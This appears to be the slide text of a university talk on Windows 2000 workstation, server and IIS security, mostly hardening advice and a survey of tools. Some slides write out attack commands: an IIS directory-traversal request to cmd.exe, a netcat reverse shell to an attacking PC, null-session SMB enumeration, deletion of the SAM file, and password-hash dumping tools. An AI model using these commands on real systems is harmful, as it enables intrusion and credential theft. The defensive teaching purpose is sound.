Professional Documents
Culture Documents
Matthew Cook
Loughborough University
http://www.escarpment.net/
1
Introduction
Loughborough University
http://www.lboro.ac.uk/computing/
2
Security @ Lboro
✦ Evaluation of Security Service/Policy
✦ Demand for Windows and Linux security
advice
✦ Need for other OS security advice
3
Windows 2000 Security
✦ Overview of General Security Threats
✦ Workstation Security
✦ Server Security
✦ IIS Security
✦ Security Tools
4
Physical Security
5
Security Threats
✦ Denial of Service
✦ Theft of information
✦ Modification
6
Security Holes
✦ Physical Security Holes
✦ Software Security Holes
✦ Social Engineering
✦ Complacency
7
Workstation Security
8
Workstation Security
✦ Physical Security
✦ BIOS
✦ Service Packs and Hot fixes
✦ NTFS ACLS
✦ Policies and Profiles
✦ Security Templates
✦ Auditing
✦ Threats
9
Service Packs and Hot fixes
✦ Ensure you have the latest ‘evaluated’
service packs and hot fixes.
✦ Check the model periodically
✦ Hfnetchk Tool
10
NTFS ACLS
✦ Ensure you use NTFS
✦ Partition your drives per application
✦ Example
11
Policies and Profiles
✦ NT Policy files are different to GPO (Group
Policy Objects) in Windows 2000
✦ LGPO located in:
%windir%\system32\grouppolicy
✦ ADGPO located in:
%windir%\system32\sysvol\camford\policies
✦ Demonstration
12
Security Templates
✦ Use ‘Security Settings’ applet to apply
✦ Located in %windir%\security\templates
✦ Demonstration
13
Security Templates…
✦ Setup security – Default settings
✦ Compatws – Compatible
14
Auditing & Event Logs
✦ Use the ‘Security Settings’ applet to ensure
the Audit Policy has been configured
✦ Check the Event Viewer regularly
✦ URL: http://www.foundstone.com/
✦ URL: http://www.tntsoftware.com/
15
Threats
✦ PipeUpAdmin and PipeUpSAM
✦ Netddemsg
✦ EFS
✦ BIOS Passwords
16
PipeUpAdmin & PipeUpSAM
✦ Uses vulnerability in Named Pipes in the
Service Control Manger (SCM)
✦ Adds user to Administrator Group
✦ URL: http://www.dogmile.com/files/
17
Netddemsg
✦ Uses vulnerability in NetDDE
✦ Provides cmd in SYSTEM context
18
EFS
✦ Changing the password of the recovery
agent. (Administrator)
✦ Changing the password of the user
19
DOS Boot Disc
✦ DOS NTFS drivers bypass NTFS ACLS
✦ Allows removal of the SAM
del %windir%\system32\config\sam
✦ Allows extraction of the SAM
✦ URL: http://www.sysinternals.com/
✦ URL:
http://www.esiea.fr/public_html/Christophe.GRE
NIER/
20
Linux Boot Disc
✦ Edit SAM password hashes
✦ Disable SYSKEY
✦ URL: http://home.eunet.no/~pnordahl/
21
BIOS Passwords
✦ Even a BIOS password is not secure
✦ Check for vulnerabilities
✦ Upgrade BIOS
✦ URL:
http://www.esiea.fr/public_html/Christophe.GRE
NIER/
22
Server Security
23
Server Security
✦ Advice for Workstation Security
✦ NetBIOS/SMB Services
✦ SNMP Vulnerabilities
✦ IPSec
24
NetBIOS/SMB Services
✦ NetBIOS Name Service [Port UDP 137]
✦ NetBIOS Session Service [Port TCP 139]
25
NetBIOS/SMB Services…
Null Authentication:
Net use \\camford\IPC$ “” /u:“”
✦ Famous tools like ‘Red Button’
26
NetBIOS/SMB Services…
✦ Dumpsec from Somarsoft
✦ URL: http://www.somarsoft.com
✦ URL: http://razor.bindview.com/
27
NetBIOS/SMB Services…
To disable NetBIOS
2. Select ‘Disable NetBIOS’ in the WINS
tab of advanced TCP/IP properties.
3. Deselect ‘File and Print sharing’ in the
advanced settings of the ‘Network and
Dial-up connections’ window
28
NetBIOS/SMB Services…
30
Hfnetchk…
31
Hfnetchk…
✦ Default scan of local host (Pre downloaded)
hfnetchk –x mssecure.xml
✦ Default scan of lboro domain
hfnetchk –d lboro
✦ Verbose scan of local host
hfnetchk –v –x mssecure.xml
✦ Verbose scan including installed hot fixes
hfnetchk –v –a b –x mssecure.xml
32
Hfnetchk…
✦ Test problems
hfnetchk –z –v –x mssecure.xml
✦ XML File Download
http://download.microsoft.com/download/xml
/security/1.0/nt5/en-us/mssecure.cab
✦ Using an internal copy of the XML
hfnetchk –x http://camford.ac.uk/mssecure.xml
hfnetchk –x s:\camford\mssecure.xml
33
QChain
Supported by:
✦ Windows NT 4.0
✦ Windows 2000
34
QChain…
✦ Run the hot fix with –z (No reboot) and –m
(Quiet mode)
✦ Run qchain and then reboot
✦ Create a log using qchain [logname]
✦ Create batch files on a central server
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=29821
35
SNMP Vulnerabilities
✦ Simple Network Management Protocol
✦ Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
✦ SNMP Utilities in Resource Kit
✦ Turn off SNMP services
36
SNMP Vulnerabilities…
37
AD Vulnerabilities
✦ Listing of AD contents using ldp.exe
✦ Ldp is contained on the Resource Kit
38
IPSec
✦ Currently investigating
✦ Linux Connectivity using FreeS/WAN
✦ URL: http://www.freeswan.org/
✦ URL: http://airsnort.sourceforge.net/
39
IIS Security
40
IIS Security
✦ History
✦ Recent Worms
✦ URL Scan
✦ The Future
41
IIS History
✦ IIS 2.0 Installed by NT 4.0
✦ IIS 3.0 followed by more common IIS 4.0
✦ http://camford/scripts/upload.asp
✦ http://camford/scripts/cmdasp.asp
✦ GET /scripts/../../winnt/system32/cmd.exe
/c+dir 200 –
✦ URL: http://www.sensepost.com/
45
System Attacks…
✦ Obtaining a remote shell
✦ Attacking PC:
nc –l –p 1234
✦ Camford:
nc.exe –v –e cmd.exe <attackingpc> 1234
✦ URL: http://www.atstake.com/research/tools/
46
System Attacks…
✦ Shell is in the context of IUSR_camford
✦ ISAPI.dll – RevertToSelf (Horovitz)
✦ Upload using upload.asp
✦ http://camford/scripts/idq.dll
✦ Version 2 coded by Foundstone
✦ http://camford/scripts/idq.dll?
✦ Patch Bulletin: MS01-26
✦ NOT included in Windows 2000 SP2
47
IIS Lock Down Tool
✦ Automatic ‘Lock Down’
✦ Locks down IIS 4.0 and IIS 5.0
✦ Express ‘lock down’ for simple web sites
✦ Custom ‘lock down’ for more complex
servers
✦ Undo facility to reverse last ‘lock down’
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=32362
48
IIS Lock Down Tool…
Disable: Remove:
✦ Active Server Pages ✦ Sample Web Files
✦ Script Virtual
✦ Index Server Interface
Directory
✦ Server Side Includes
✦ MSADC Directory
✦ Internet Data
✦ WebDAV
Connector
Set Permissions on:
✦ Internet Printing
✦ Exe files
✦ HTR Scripting
✦ Content Directories
49
URL Scan
✦ ISAPI filter scans incoming HTTP requests
✦ Filtered based on rule set
✦ New rules easily added
✦ Default urlscan.ini suitable for static pages
✦ Restart service when changes made
✦ 404 and logged request for matched rules
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=32571
50
URL Scan…
Filter on:
✦ The request method (verb)
✦ File Extension
✦ URL Encoding
51
The Future
✦ Gartner report recommends ditching IIS
✦ Rewrite of IIS on the cards for version 6
52
Security Tools
53
Security Tools
✦ Snort
✦ CIS and Typhon
✦ Pwdump
✦ Fport
✦ L0pht Crack
✦ Nmap
✦ Nessus
✦ Pandora
54
Snort
✦ IDS – Intrusion Detection System
✦ Libpcap packet sniffer and logger
✦ Open Source
55
Snort…
58
CIS and Typhon
✦ Typhon, formally Cerberus Internet Scanner
✦ Written by David Litchfield
✦ URL: http://www.nextgenss.com/
✦ Demonstration
59
CIS and Typhon
✦ Web Checks ✦ SNMP Checks
✦ FTP Checks ✦ RPC Checks
✦ SMTP Checks ✦ Portscan (TCP/UDP)
✦ POP3 Checks ✦ Finger Checks
✦ NT Checks ✦ DNS Checks
✦ NetBIOS Checks
✦ MS SQL Checks ✦ Commercial Version
60
Pwdump
✦ Version 3 (e = encrypted)
✦ Developed by Phil Staubs and Erik
Hjelmstad
✦ Based on pwdump and pwdump2
✦ URL: http://www.ebiz-
tech.com/html/pwdump.html
61
Pwdump…
✦ Needs Administrative Privilidges
✦ Extracts hashs even if syskey is installed
62
Fport
✦ Reports on all open TCP and UDP ports
✦ Maps Port to Application
✦ URL: http://www.foundstone.com/
✦ Demonstration
63
L0pht Crack
✦ Password Auditing and Recovery
✦ Crack Passwords from many sources
✦ Registration $249
✦ URL: http://www.atstake.com/research/lc3/
✦ Demonstration
64
L0pht Crack…
✦ Remote Machine
✦ SAM File
✦ SMB Sniffer
✦ PWDump file
65
Nmap
✦ Port Scanning Tool
✦ Stealth scanning, OS Fingerprinting
✦ Open Source
✦ URL: http://www.insure.org/nmap/
66
Nmap…
67
Nessus
✦ Remote security scanner similar to Typhon
✦ Very comprehensive
✦ Open Source
✦ URL: http://nessus.org/
68
Pandora
✦ Not strictly Windows 2000 Security
✦ Runs on either Unix or Win32
✦ Open Source
✦ URL: http://www.nmrc.org/pandora/
69
Questions and Answers
70